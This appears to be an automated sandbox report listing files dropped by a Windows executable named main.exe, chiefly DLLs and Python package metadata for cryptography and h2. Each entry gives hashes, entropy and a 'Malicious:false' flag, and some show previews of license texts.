                                                                                                                                                                                                                                                      SHA-512:48F7723A8C039ABD6CCB2906FBD310F0CFA170DCBDF89A6437DD02C8F77F20E6C7C402D29B922CDAABD357D3A33E34C3AD826127134F38D77A4D6D9C83371949
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\main.exe
                                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):79640
                                                                                                                                                                                                                                                      Entropy (8bit):6.2850210970921685
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:1536:kHan8OG4wAM/Hh2JO9/s+S+pzpTzVs/tiTFVf77neJIYLw47Syt6xr:8an8OAF2JO9/sT+pzVVs/tYFVT7neJIh
                                                                                                                                                                                                                                                      MD5:B77017BAA2004833EF3847A3A3141280
                                                                                                                                                                                                                                                      SHA1:39666F74BD076015B376FC81250DFF89DFF4B0A6
                                                                                                                                                                                                                                                      SHA-256:A19E3C7C03EF1B5625790B1C9C42594909311AB6DF540FBF43C6AA93300AB166
                                                                                                                                                                                                                                                      SHA-512:6B24D0E038C433B995BD05DE7C8FE7DD7B0A11152937C189B8854C95780B0220A9435DE0DB7AC796A7DE11A59C61D56B1AEF9A8DBABA62D02325122CEB8B003D
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\main.exe
                                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):120600
                                                                                                                                                                                                                                                      Entropy (8bit):6.240981089705126
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:3072:+EgLOUA2h7LvTgi3CLl147ZvV9NdrRvdO5yRAui1BMJHMMTqg26bNIYOQzX:DwOAhHrgD5NGJHh7bX
                                                                                                                                                                                                                                                      MD5:68D89AAAB48B82A7D76FB65E9C613A24
                                                                                                                                                                                                                                                      SHA1:B872497EBE4ABA49025C9F836F4B2A3F1F033E5E
                                                                                                                                                                                                                                                      SHA-256:FF6A2A2F38B21B7784F97D604C99961D8C07EF455F7908110A4E893835D42B76
                                                                                                                                                                                                                                                      SHA-512:5EEC9169AB29C291010F0E171C3123552D8C68E943A615DC2F8E1AE75F809A54343572737279D9582B585997ED390AF856F551DADEADA85AE2F1AA908FC9B39C
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\main.exe
                                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):178456
                                                                                                                                                                                                                                                      Entropy (8bit):5.950409422612943
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:3072:mn5VVb4iZpIy+vgSf36XK7DapGB4JQELqOlh59YL48WKqgVl5pVIYC7Nb0CY:m5Vp4EaDD36XK7r4JkQY
                                                                                                                                                                                                                                                      MD5:0F02ECCD7933B7A7C2BDEDCA2A72AAB6
                                                                                                                                                                                                                                                      SHA1:0B4C551D8FE34D8128E5CF97DAA19EB4C97DB06E
                                                                                                                                                                                                                                                      SHA-256:BA5388D6A6557D431E086734A3323621DC447F63BA299B0A815E5837CF869678
                                                                                                                                                                                                                                                      SHA-512:90A64082DAB51380E05C76047EE40E259C719D7170FB4ACB247B68A03B710461B350DA3821B426FD13167895DED32F9C5EC0E07587AD4125683A18A3495F5ED5
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\main.exe
                                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):25368
                                                                                                                                                                                                                                                      Entropy (8bit):6.624360990215148
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:384:8ZL2/LE/t8Cfi/1VIYZwXmHQIYiSy1pCQgyaxPAM+o/8E9VF0Ny8/r:8qLadI1VIYZws5YiSyvXaxPAMxkEq
                                                                                                                                                                                                                                                      MD5:CC2FC10D528EC8EAC403F3955A214D5B
                                                                                                                                                                                                                                                      SHA1:3EEFD8E449532C13AE160AA631FDB0AD8F6F2EA4
                                                                                                                                                                                                                                                      SHA-256:E6AA7F1637E211251C9D6F467203B2B6D85E5BC2D901699F2A55AF637FA89250
                                                                                                                                                                                                                                                      SHA-512:BF18089BD0B3A880930827D2035302060EA9DB529AD1020879E5BE6DE42693BD0A01B40270B4E93CEAEA3CFED20DAD1E2942D983CDE8BB2C99159B32209B34BB
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\main.exe
                                                                                                                                                                                                                                                      File Type:Zip archive data, at least v2.0 to extract, compression method=store
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1443565
                                                                                                                                                                                                                                                      Entropy (8bit):5.590567355673458
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24576:mQR5pATG8/R5lUKdcubgAnyfbM3AUwjwhJdmzRPUaYHHG:mQR5pE/RtQp7
                                                                                                                                                                                                                                                      MD5:ADD95481A8E9D5743EEE394036CA4914
                                                                                                                                                                                                                                                      SHA1:EAB5D38E7FA33AE86452E6609ED8AFED21516969
                                                                                                                                                                                                                                                      SHA-256:396171544049D4554472E78CB41F873F7D8951D7450685F364D4487D09B98AD8
                                                                                                                                                                                                                                                      SHA-512:161B64229F676D1894954BEF08FBC0CACC9A5AFF5CBF607918F919AA7065E9B5EDBAED7057D0113EEC24C688B60E7DCD0AA8610105AB350C6C5C30E0F5E6DB1A
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\main.exe
                                                                                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):294769
                                                                                                                                                                                                                                                      Entropy (8bit):6.047057219398099
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:6144:QW1x/M8fRRiplkXURrVADwYCuCCgT/Q5MSRqNb7d84u5Nahx:QWb/TRiLWURrId5MWavdX08/
                                                                                                                                                                                                                                                      MD5:52A8319281308DE49CCEF4850A7245BC
                                                                                                                                                                                                                                                      SHA1:43D20D833B084454311CA9B00DD7595C527CE3BB
                                                                                                                                                                                                                                                      SHA-256:807897254F383A27F45E44F49656F378ABAB2141EDE43A4AD3C2420A597DD23F
                                                                                                                                                                                                                                                      SHA-512:2764222C0CD8C862906AC0E3E51F201E748822FE9CE9B1008F3367FDD7F0DB7CC12BF86E319511157AF087DD2093C42E2D84232FAE023D35EE1E425E7C43382D
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\main.exe
                                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):10752
                                                                                                                                                                                                                                                      Entropy (8bit):4.8208567868970675
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:96:Y0fK74ACb0xx2uKynu10YLsgxwJiUNiL0U5IZsJFPGDtCFuCQAAZWQcX6g8H4a81:gFCk2z1/t12iwU5usJFKCyHcqgg
                                                                                                                                                                                                                                                      MD5:CBF62E25E6E036D3AB1946DBAFF114C1
                                                                                                                                                                                                                                                      SHA1:B35F91EAF4627311B56707EF12E05D6D435A4248
                                                                                                                                                                                                                                                      SHA-256:06032E64E1561251EA3035112785F43945B1E959A9BF586C35C9EA1C59585C37
                                                                                                                                                                                                                                                      SHA-512:04B694D0AE99D5786FA19F03C5B4DD8124C4F9144CFE7CA250B48A3C0DE0883E06A6319351AE93EA95B55BBBFA69525A91E9407478E40AD62951F1D63D45FF18
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\main.exe
                                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):121344
                                                                                                                                                                                                                                                      Entropy (8bit):5.899699901799497
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:3072:3Ives1m094QtwqlaZTwuQMS/Pf+vGTVmEU:3PsQIJmE
                                                                                                                                                                                                                                                      MD5:BAC273806F46CFFB94A84D7B4CED6027
                                                                                                                                                                                                                                                      SHA1:773FBC0435196C8123EE89B0A2FC4D44241FF063
                                                                                                                                                                                                                                                      SHA-256:1D9ABA3FF1156EA1FBE10B8AA201D4565AE6022DAF2117390D1D8197B80BB70B
                                                                                                                                                                                                                                                      SHA-512:EAEC1F072C2C0BC439AC7B4E3AEA6E75C07BD4CD2D653BE8500BBFFE371FBFE045227DAEAD653C162D972CCAADFF18AC7DA4D366D1200618B0291D76E18B125C
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\main.exe
                                                                                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):4
                                                                                                                                                                                                                                                      Entropy (8bit):1.5
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:3:Mn:M
                                                                                                                                                                                                                                                      MD5:365C9BFEB7D89244F2CE01C1DE44CB85
                                                                                                                                                                                                                                                      SHA1:D7A03141D5D6B1E88B6B59EF08B6681DF212C599
                                                                                                                                                                                                                                                      SHA-256:CEEBAE7B8927A3227E5303CF5E0F1F7B34BB542AD7250AC03FBCDE36EC2F1508
                                                                                                                                                                                                                                                      SHA-512:D220D322A4053D84130567D626A9F7BB2FB8F0B854DA1621F001826DC61B0ED6D3F91793627E6F0AC2AC27AEA2B986B6A7A63427F05FE004D8A2ADFBDADC13C1
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:pip.
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\main.exe
                                                                                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):5724
                                                                                                                                                                                                                                                      Entropy (8bit):5.120429897887076
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:96:DlkQIUQIhQIKQILbQIRIaMPktjaVMxsxA2ncEvGDfe0HEdwGArNZG0JQTQCQx5Kw:dcPuPwsrcEvGDfe0HENA5w0JQTQ9x59H
                                                                                                                                                                                                                                                      MD5:526D9AC9D8150602EC9ED8B9F4DE7102
                                                                                                                                                                                                                                                      SHA1:DBA2CB32C21C4B0F575E77BBCDD4FA468056F5E3
                                                                                                                                                                                                                                                      SHA-256:D95F491ED418DC302DB03804DAF9335CE21B2DF4704587E6851EF03E1F84D895
                                                                                                                                                                                                                                                      SHA-512:FB13A2F6B64CB7E380A69424D484FC9B8758FA316A7A155FF062BFDACDCA8F2C5D2A03898CD099688B1C16A5A0EDCECFC42BF0D4D330926B10C3FCE9F5238643
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:Metadata-Version: 2.3.Name: cryptography.Version: 44.0.0.Classifier: Development Status :: 5 - Production/Stable.Classifier: Intended Audience :: Developers.Classifier: License :: OSI Approved :: Apache Software License.Classifier: License :: OSI Approved :: BSD License.Classifier: Natural Language :: English.Classifier: Operating System :: MacOS :: MacOS X.Classifier: Operating System :: POSIX.Classifier: Operating System :: POSIX :: BSD.Classifier: Operating System :: POSIX :: Linux.Classifier: Operating System :: Microsoft :: Windows.Classifier: Programming Language :: Python.Classifier: Programming Language :: Python :: 3.Classifier: Programming Language :: Python :: 3 :: Only.Classifier: Programming Language :: Python :: 3.7.Classifier: Programming Language :: Python :: 3.8.Classifier: Programming Language :: Python :: 3.9.Classifier: Programming Language :: Python :: 3.10.Classifier: Programming Language :: Python :: 3.11.Classifier: Programming Language :: Python :: 3.12.Classif
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\main.exe
                                                                                                                                                                                                                                                      File Type:CSV text
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):16286
                                                                                                                                                                                                                                                      Entropy (8bit):5.5834828293766785
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:192:hXy1GL/l45jEVeKUZVhXau4WJU6F6Gotqw+Iq+NX6ih5VfUqb8q:hXPlMEVdcaiJU6F6Gotqw+/+96ih18q
                                                                                                                                                                                                                                                      MD5:2496DE2174F8C9A02A970CE99AD11C1D
                                                                                                                                                                                                                                                      SHA1:ED8C5FA701B40E21D4EE61F83412208551170413
                                                                                                                                                                                                                                                      SHA-256:B118C21B2F7685A5866671188418B0F788DC06FFD491DBC3B402D7C49652604E
                                                                                                                                                                                                                                                      SHA-512:6D8A4FC895A8CB3ED088E6C910B3E1BB132B4DCA140DE354EF48C98EBF626E6D6BF29CE39342651D69010A2CB4A2135B2375DFDF162835B900011ADB092FD5E9
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:cryptography-44.0.0.dist-info/INSTALLER,sha256=zuuue4knoyJ-UwPPXg8fezS7VCrXJQrAP7zeNuwvFQg,4..cryptography-44.0.0.dist-info/METADATA,sha256=2V9JHtQY3DAtsDgE2vkzXOIbLfRwRYfmhR7wPh-E2JU,5724..cryptography-44.0.0.dist-info/RECORD,,..cryptography-44.0.0.dist-info/WHEEL,sha256=Hn9bytZpOGoR6M4U5xUTHC1AJpPD9B1xPrM4STxljEU,94..cryptography-44.0.0.dist-info/licenses/LICENSE,sha256=Pgx8CRqUi4JTO6mP18u0BDLW8amsv4X1ki0vmak65rs,197..cryptography-44.0.0.dist-info/licenses/LICENSE.APACHE,sha256=qsc7MUj20dcRHbyjIJn2jSbGRMaBOuHk8F9leaomY_4,11360..cryptography-44.0.0.dist-info/licenses/LICENSE.BSD,sha256=YCxMdILeZHndLpeTzaJ15eY9dz2s0eymiSMqtwCPtPs,1532..cryptography/__about__.py,sha256=fcUqF1IcadxBSH0us1vCvob0OJOrPV3h30yZD8wsHo4,445..cryptography/__init__.py,sha256=XsRL_PxbU6UgoyoglAgJQSrJCP97ovBA8YIEQ2-uI68,762..cryptography/__pycache__/__about__.cpython-311.pyc,,..cryptography/__pycache__/__init__.cpython-311.pyc,,..cryptography/__pycache__/exceptions.cpython-311.pyc,,..cryptography/__pycache__/fernet
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\main.exe
                                                                                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):94
                                                                                                                                                                                                                                                      Entropy (8bit):5.0373614967294325
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:3:RtEeX5pG6vhP+tkKciH/KQb:RtvoKWKTQb
                                                                                                                                                                                                                                                      MD5:A868F93FCF51C4F1C25658D54F994349
                                                                                                                                                                                                                                                      SHA1:535C88A10911673DEABB7889D365E81729E483A6
                                                                                                                                                                                                                                                      SHA-256:1E7F5BCAD669386A11E8CE14E715131C2D402693C3F41D713EB338493C658C45
                                                                                                                                                                                                                                                      SHA-512:EC13CAC9DF03676640EF5DA033E8C2FAEE63916F27CC27B9C43F0824B98AB4A6ECB4C8D7D039FA6674EF189BDD9265C8ED509C1D80DFF610AEB9E081093AEB3D
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:Wheel-Version: 1.0.Generator: maturin (1.7.5).Root-Is-Purelib: false.Tag: cp39-abi3-win_amd64.
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\main.exe
                                                                                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):197
                                                                                                                                                                                                                                                      Entropy (8bit):4.61968998873571
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:3:hWDncJhByZmJgXPForADu1QjygQuaAJygT2d5GeWreLRuOFEXAYeBKmJozlMHuO:h9Co8FyQjkDYc5tWreLBF/pn2mH1
                                                                                                                                                                                                                                                      MD5:8C3617DB4FB6FAE01F1D253AB91511E4
                                                                                                                                                                                                                                                      SHA1:E442040C26CD76D1B946822CAF29011A51F75D6D
                                                                                                                                                                                                                                                      SHA-256:3E0C7C091A948B82533BA98FD7CBB40432D6F1A9ACBF85F5922D2F99A93AE6BB
                                                                                                                                                                                                                                                      SHA-512:77A1919E380730BCCE5B55D76FBFFBA2F95874254FAD955BD2FE1DE7FC0E4E25B5FDAAB0FEFFD6F230FA5DC895F593CF8BFEDF8FDC113EFBD8E22FADAB0B8998
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:This software is made available under the terms of *either* of the licenses.found in LICENSE.APACHE or LICENSE.BSD. Contributions to cryptography are made.under the terms of *both* these licenses..
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\main.exe
                                                                                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):11360
                                                                                                                                                                                                                                                      Entropy (8bit):4.426756947907149
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:192:nUDG5KXSD9VYUKhu1JVF9hFGvV/QiGkS594drFjuHYx5dvTrLh3kTSEnQHbHR:UIvlKM1zJlFvmNz5VrlkTS0QHt
                                                                                                                                                                                                                                                      MD5:4E168CCE331E5C827D4C2B68A6200E1B
                                                                                                                                                                                                                                                      SHA1:DE33EAD2BEE64352544CE0AA9E410C0C44FDF7D9
                                                                                                                                                                                                                                                      SHA-256:AAC73B3148F6D1D7111DBCA32099F68D26C644C6813AE1E4F05F6579AA2663FE
                                                                                                                                                                                                                                                      SHA-512:F451048E81A49FBFA11B49DE16FF46C52A8E3042D1BCC3A50AAF7712B097BED9AE9AED9149C21476C2A1E12F1583D4810A6D36569E993FE1AD3879942E5B0D52
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:. Apache License. Version 2.0, January 2004. https://www.apache.org/licenses/.. TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION.. 1. Definitions... "License" shall mean the terms and conditions for use, reproduction,. and distribution as defined by Sections 1 through 9 of this document... "Licensor" shall mean the copyright owner or entity authorized by. the copyright owner that is granting the License... "Legal Entity" shall mean the union of the acting entity and all. other entities that control, are controlled by, or are under common. control with that entity. For the purposes of this definition,. "control" means (i) the power, direct or indirect, to cause the. direction or management of such entity, whether by contract or. otherwise, or (ii) ownership of fifty percent (50%) or more of the. outstanding shares, or (iii) beneficial ow
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\main.exe
                                                                                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1532
                                                                                                                                                                                                                                                      Entropy (8bit):5.058591167088024
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:Copyright (c) Individual contributors..All rights reserved...Redistribution and use in source and binary forms, with or without.modification, are permitted provided that the following conditions are met:.. 1. Redistributions of source code must retain the above copyright notice,. this list of conditions and the following disclaimer... 2. Redistributions in binary form must reproduce the above copyright. notice, this list of conditions and the following disclaimer in the. documentation and/or other materials provided with the distribution... 3. Neither the name of PyCA Cryptography nor the names of its contributors. may be used to endorse or promote products derived from this software. without specific prior written permission...THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND.ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED.WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOS
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\main.exe
                                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):8292864
                                                                                                                                                                                                                                                      Entropy (8bit):6.493076254122072
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\main.exe
                                                                                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):4
                                                                                                                                                                                                                                                      Entropy (8bit):1.5
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:pip.
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\main.exe
                                                                                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1102
                                                                                                                                                                                                                                                      Entropy (8bit):5.120351253767657
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:The MIT License (MIT)..Copyright (c) 2015-2020 Cory Benfield and contributors..Permission is hereby granted, free of charge, to any person obtaining a copy.of this software and associated documentation files (the "Software"), to deal.in the Software without restriction, including without limitation the rights.to use, copy, modify, merge, publish, distribute, sublicense, and/or sell.copies of the Software, and to permit persons to whom the Software is.furnished to do so, subject to the following conditions:..The above copyright notice and this permission notice shall be included in.all copies or substantial portions of the Software...THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR.IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,.FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE.AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER.LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE,
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\main.exe
                                                                                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):3583
                                                                                                                                                                                                                                                      Entropy (8bit):4.978673419311688
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:Metadata-Version: 2.1.Name: h2.Version: 4.1.0.Summary: HTTP/2 State-Machine based protocol implementation.Home-page: https://github.com/python-hyper/h2.Author: Cory Benfield.Author-email: cory@lukasa.co.uk.License: MIT License.Platform: UNKNOWN.Classifier: Development Status :: 5 - Production/Stable.Classifier: Intended Audience :: Developers.Classifier: License :: OSI Approved :: MIT License.Classifier: Programming Language :: Python.Classifier: Programming Language :: Python :: 3.Classifier: Programming Language :: Python :: 3.6.Classifier: Programming Language :: Python :: 3.7.Classifier: Programming Language :: Python :: 3.8.Classifier: Programming Language :: Python :: 3.9.Classifier: Programming Language :: Python :: 3.10.Classifier: Programming Language :: Python :: Implementation :: CPython.Classifier: Programming Language :: Python :: Implementation :: PyPy.Requires-Python: >=3.6.1.Description-Content-Type: text/x-rst.License-File: LICENSE.Requires-Dist: hyperframe (<7,>=6.0).
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\main.exe
                                                                                                                                                                                                                                                      File Type:CSV text
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1716
                                                                                                                                                                                                                                                      Entropy (8bit):5.821419256958962
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:h2-4.1.0.dist-info/INSTALLER,sha256=zuuue4knoyJ-UwPPXg8fezS7VCrXJQrAP7zeNuwvFQg,4..h2-4.1.0.dist-info/LICENSE,sha256=emWlrwy6vxwWJRx8ayt8tG0WpyIueZdbm2H81mouPyg,1102..h2-4.1.0.dist-info/METADATA,sha256=xQTqopWF9r3ZVkT-xCDHAWWZQB3g_zyqgKxCl0ioR6Q,3583..h2-4.1.0.dist-info/RECORD,,..h2-4.1.0.dist-info/WHEEL,sha256=OqRkF0eY5GHssMorFjlbTIq072vpHpF60fIQA6lS9xA,92..h2-4.1.0.dist-info/top_level.txt,sha256=Hiulx8KxI2jFUM1dG7-CZeRkO3j50MBwCLG36Vrq-kI,3..h2/__init__.py,sha256=inV-bCAUhD_QGjQe5Mk8gl7F85v26UW9W3BHov9vBAA,86..h2/__pycache__/__init__.cpython-311.pyc,,..h2/__pycache__/config.cpython-311.pyc,,..h2/__pycache__/connection.cpython-311.pyc,,..h2/__pycache__/errors.cpython-311.pyc,,..h2/__pycache__/events.cpython-311.pyc,,..h2/__pycache__/exceptions.cpython-311.pyc,,..h2/__pycache__/frame_buffer.cpython-311.pyc,,..h2/__pycache__/settings.cpython-311.pyc,,..h2/__pycache__/stream.cpython-311.pyc,,..h2/__pycache__/utilities.cpython-311.pyc,,..h2/__pycache__/windows.cpython-311.pyc,,..h2/config
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\main.exe
                                                                                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):92
                                                                                                                                                                                                                                                      Entropy (8bit):4.842566724466667
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:Wheel-Version: 1.0.Generator: bdist_wheel (0.36.2).Root-Is-Purelib: true.Tag: py3-none-any..
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\main.exe
                                                                                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):3
                                                                                                                                                                                                                                                      Entropy (8bit):1.584962500721156
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:3:Vn:V
                                                                                                                                                                                                                                                      MD5:4217C1CE78C1E6BAE73FE12CE19C51D3
                                                                                                                                                                                                                                                      SHA1:8BA0141FFAA18F4355DB911606B6B283D9BEF1B1
                                                                                                                                                                                                                                                      SHA-256:1E2BA5C7C2B12368C550CD5D1BBF8265E4643B78F9D0C07008B1B7E95AEAFA42
                                                                                                                                                                                                                                                      SHA-512:E735248AA6CC62335983C38AC04631F512B1444D3FACD5FE00064F6649D9382CC8A1661BFEF4978156B2BBD93C27FCDFD581416B05EBC91B59FEFD3C51207067
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:h2.
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\main.exe
                                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):5209352
                                                                                                                                                                                                                                                      Entropy (8bit):5.8113605800313595
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:98304:UlAXTY8BwEVQ1qb0Oev71CPwDvt3uFRnCLF:UlAXTY8BFVQ1qAOi1CPwDvt3uFRnCLF
                                                                                                                                                                                                                                                      MD5:54CA3E6AFCB3C57C7914C0856D779F2A
                                                                                                                                                                                                                                                      SHA1:E37BE8D92350AA1F9DD3212015DE959FAA58AA2F
                                                                                                                                                                                                                                                      SHA-256:7AED0BC00D2F0CA0DE95EAA6461327BD2E4543723A6CA443A7E899738B353B5A
                                                                                                                                                                                                                                                      SHA-512:E8079E9D4BFA253677A669913F8198882C2EAAF9251F11CFA64EED5597C34AB7C267BED3826AD9F0A83675177A7575AF54081852A5A633D999BD13CF873A79E8
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\main.exe
                                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):5191960
                                                                                                                                                                                                                                                      Entropy (8bit):5.962142634441191
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:98304:n3+pefu6fSar+SJ8aqfPomg1CPwDvt3uFlDCE:3G+u6fb+SJ8aqfwmg1CPwDvt3uFlDCE
                                                                                                                                                                                                                                                      MD5:E547CF6D296A88F5B1C352C116DF7C0C
                                                                                                                                                                                                                                                      SHA1:CAFA14E0367F7C13AD140FD556F10F320A039783
                                                                                                                                                                                                                                                      SHA-256:05FE080EAB7FC535C51E10C1BD76A2F3E6217F9C91A25034774588881C3F99DE
                                                                                                                                                                                                                                                      SHA-512:9F42EDF04C7AF350A00FA4FDF92B8E2E6F47AB9D2D41491985B20CD0ADDE4F694253399F6A88F4BDD765C4F49792F25FB01E84EC03FD5D0BE8BB61773D77D74D
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\main.exe
                                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
